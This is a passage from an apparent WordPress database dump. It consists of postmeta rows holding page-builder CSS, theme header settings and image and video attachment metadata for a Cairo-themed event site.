!important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20117,3227,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027721644{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20118,3228,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20119,3229,'_wp_attached_file','2022/11/about2.jpg'),
(20120,3229,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:700;s:6:\"height\";i:525;s:4:\"file\";s:18:\"2022/11/about2.jpg\";s:8:\"filesize\";i:409459;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"about2-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25510;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"about2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9476;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:18:\"about2-500x375.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61221;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20121,3230,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20122,3231,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20123,3232,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20124,3233,'_wpb_vc_js_status','true'),
(20125,3233,'_dt_sidebar_position','disabled'),
(20126,3233,'_dt_sidebar_widgetarea_id','sidebar_1'),
(20127,3233,'_dt_sidebar_hide_on_mobile','0'),
(20128,3233,'_dt_footer_show','1'),
(20129,3233,'_dt_footer_widgetarea_id','sidebar_2'),
(20130,3233,'_dt_footer_hide_on_mobile','0'),
(20131,3233,'_dt_header_title','fancy'),
(20132,3233,'_dt_header_background','normal'),
(20133,3233,'_dt_header_background_below_slideshow','disabled'),
(20134,3233,'_dt_header_transparent_bg_color_scheme','light'),
(20135,3233,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(20136,3233,'_dt_header_transparent_top_bar_bg_opacity','25'),
(20137,3233,'_dt_header_transparent_bg_color','#000000'),
(20138,3233,'_dt_header_transparent_bg_opacity','50'),
(20139,3233,'_dt_header_disabled_background','normal'),
(20140,3233,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(20141,3233,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(20142,3233,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(20143,3233,'_dt_header_disabled_transparent_bg_color','#000000'),
(20144,3233,'_dt_header_disabled_transparent_bg_opacity','50'),
(20145,3233,'_dt_page_overrides_top_margin',''),
(20146,3233,'_dt_page_overrides_right_margin',''),
(20147,3233,'_dt_page_overrides_bottom_margin',''),
(20148,3233,'_dt_page_overrides_left_margin',''),
(20149,3233,'_dt_mobile_page_padding_top',''),
(20150,3233,'_dt_mobile_page_padding_right',''),
(20151,3233,'_dt_mobile_page_padding_bottom',''),
(20152,3233,'_dt_mobile_page_padding_left',''),
(20153,3233,'_dt_fancy_header_layout_heading',''),
(20154,3233,'_dt_fancy_header_title_aligment','center'),
(20155,3233,'_dt_fancy_header_height','650'),
(20156,3233,'_dt_fancy_header_padding-top','0px'),
(20157,3233,'_dt_fancy_header_padding-bottom','0px'),
(20158,3233,'_dt_fancy_header_breadcrumbs_heading',''),
(20159,3233,'_dt_fancy_header_breadcrumbs','disabled'),
(20160,3233,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(20161,3233,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(20162,3233,'_dt_fancy_header_title_heading',''),
(20163,3233,'_dt_fancy_header_title_mode','custom'),
(20164,3233,'_dt_fancy_header_title','WELCOME'),
(20165,3233,'_dt_fancy_header_title_font_size','45'),
(20166,3233,'_dt_fancy_header_title_line_height','36'),
(20167,3233,'_dt_fancy_header_text_transform','none'),
(20168,3233,'_dt_fancy_header_title_color_mode','color'),
(20169,3233,'_dt_fancy_header_title_color','#ffffff'),
(20170,3233,'_dt_fancy_header_subtitle_heading',''),
(20171,3233,'_dt_fancy_header_subtitle',''),
(20172,3233,'_dt_fancy_header_subtitle_font_size','18'),
(20173,3233,'_dt_fancy_header_subtitle_line_height','26'),
(20174,3233,'_dt_fancy_header_subtitle_text_transform','none'),
(20175,3233,'_dt_fancy_header_subtitle_color_mode','color'),
(20176,3233,'_dt_fancy_header_subtitle_color','#ffffff'),
(20177,3233,'_dt_fancy_header_bg_heading',''),
(20178,3233,'_dt_fancy_header_bg_color','#222222'),
(20179,3233,'_dt_fancy_header_bg_image_origin','featured_image'),
(20180,3233,'_dt_fancy_header_bg_image','a:0:{}'),
(20181,3233,'_dt_fancy_header_bg_repeat','no-repeat'),
(20182,3233,'_dt_fancy_header_bg_position_x','center'),
(20183,3233,'_dt_fancy_header_bg_position_y','center'),
(20184,3233,'_dt_fancy_header_bg_fullscreen','1'),
(20185,3233,'_dt_fancy_header_bg_overlay','0'),
(20186,3233,'_dt_fancy_header_overlay_color','#000'),
(20187,3233,'_dt_fancy_header_bg_overlay_opacity','50'),
(20188,3233,'_dt_fancy_header_scroll_effect','default'),
(20189,3233,'_dt_fancy_header_bg_parallax','0.5'),
(20190,3233,'_dt_fancy_header_responsiveness_heading',''),
(20191,3233,'_dt_fancy_header_responsiveness','enabled'),
(20192,3233,'_dt_fancy_header_responsiveness_switch','200px'),
(20193,3233,'_dt_fancy_header_responsive_height','50'),
(20194,3233,'_dt_fancy_header_responsive_font_size','30'),
(20195,3233,'_dt_fancy_header_responsive_title_line_height','38'),
(20196,3233,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(20197,3233,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(20198,3233,'_dt_fancy_header_responsive_breadcrumbs','enabled'),
(20199,3233,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 650px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 45px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 200px) {\n  .fancy-header .wf-wrap {\n    min-height: 50px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(20200,3233,'_wp_page_template','default'),
(20201,3233,'_dt_microsite_primary_menu',''),
(20202,3233,'_dt_microsite_split_left_menu',''),
(20203,3233,'_dt_microsite_split_right_menu',''),
(20204,3233,'_dt_microsite_mobile_menu',''),
(20205,3233,'_dp_original','2638'),
(20206,3233,'_edit_lock','1669415139:1'),
(20207,3233,'_edit_last','1'),
(20217,3237,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668028615691{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20218,3239,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}'),
(20219,3233,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}.vc_custom_1685790265719{margin-top: -75px !important;}'),
(20220,3241,'_wp_attached_file','2022/11/0-Where-to-Stay-in-Cairo.jpg'),
(20221,3241,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1320;s:6:\"height\";i:621;s:4:\"file\";s:36:\"2022/11/0-Where-to-Stay-in-Cairo.jpg\";s:8:\"filesize\";i:144239;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:36:\"0-Where-to-Stay-in-Cairo-300x141.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14421;}s:5:\"large\";a:5:{s:4:\"file\";s:37:\"0-Where-to-Stay-in-Cairo-1024x482.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:482;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122175;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:36:\"0-Where-to-Stay-in-Cairo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8323;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:36:\"0-Where-to-Stay-in-Cairo-768x361.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:361;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74358;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:36:\"0-Where-to-Stay-in-Cairo-500x235.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35411;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:36:\"0-Where-to-Stay-in-Cairo-800x376.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:376;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79219;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:37:\"0-Where-to-Stay-in-Cairo-1280x602.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:602;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:174520;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(20222,3233,'_thumbnail_id','3365'),
(20223,3242,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}'),
(20224,3243,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}'),
(20225,2082,'_wp_old_date','2022-11-08'),
(20226,2083,'_wp_old_date','2022-11-08'),
(20227,2346,'_wp_old_date','2022-11-08'),
(20228,2348,'_wp_old_date','2022-11-08'),
(20229,2349,'_wp_old_date','2022-11-08'),
(20230,2350,'_wp_old_date','2022-11-08'),
(20231,2351,'_wp_old_date','2022-11-08'),
(20232,2904,'_wp_old_date','2022-11-08'),
(20233,2084,'_wp_old_date','2022-11-08'),
(20234,2352,'_wp_old_date','2022-11-08'),
(20235,2281,'_wp_old_date','2022-11-08'),
(20236,2353,'_wp_old_date','2022-11-08'),
(20237,2354,'_wp_old_date','2022-11-08'),
(20238,2355,'_wp_old_date','2022-11-08'),
(20239,2282,'_wp_old_date','2022-11-08'),
(20240,2283,'_wp_old_date','2022-11-08'),
(20241,2284,'_wp_old_date','2022-11-08'),
(20242,2921,'_wp_old_date','2022-11-08'),
(20243,2285,'_wp_old_date','2022-11-08'),
(20244,2356,'_wp_old_date','2022-11-08'),
(20245,2357,'_wp_old_date','2022-11-08'),
(20246,2359,'_wp_old_date','2022-11-08'),
(20247,2358,'_wp_old_date','2022-11-08'),
(20248,2286,'_wp_old_date','2022-11-08'),
(20249,3244,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}'),
(20250,3245,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}'),
(20251,3246,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20252,3248,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}'),
(20253,3250,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20254,3251,'_wp_attached_file','2022/11/intro.avi'),
(20255,3251,'_wp_attachment_metadata','a:12:{s:8:\"lossless\";b:0;s:12:\"bitrate_mode\";s:3:\"vbr\";s:8:\"filesize\";i:23947010;s:9:\"mime_type\";s:9:\"video/avi\";s:6:\"length\";i:54;s:16:\"length_formatted\";s:4:\"0:54\";s:5:\"width\";i:1280;s:6:\"height\";i:720;s:10:\"fileformat\";s:3:\"avi\";s:10:\"dataformat\";s:3:\"avi\";s:5:\"codec\";s:40:\"DivX MPEG-4 v4 (OpenDivX / Project Mayo)\";s:5:\"audio\";a:8:{s:10:\"dataformat\";s:3:\"mp3\";s:12:\"bitrate_mode\";s:3:\"cbr\";s:10:\"wformattag\";i:85;s:5:\"codec\";s:12:\"MPEG Layer-3\";s:8:\"channels\";i:2;s:11:\"sample_rate\";i:44100;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";}}'),
(20256,3252,'_wp_attached_file','2022/11/dr-ismael.mp4'),
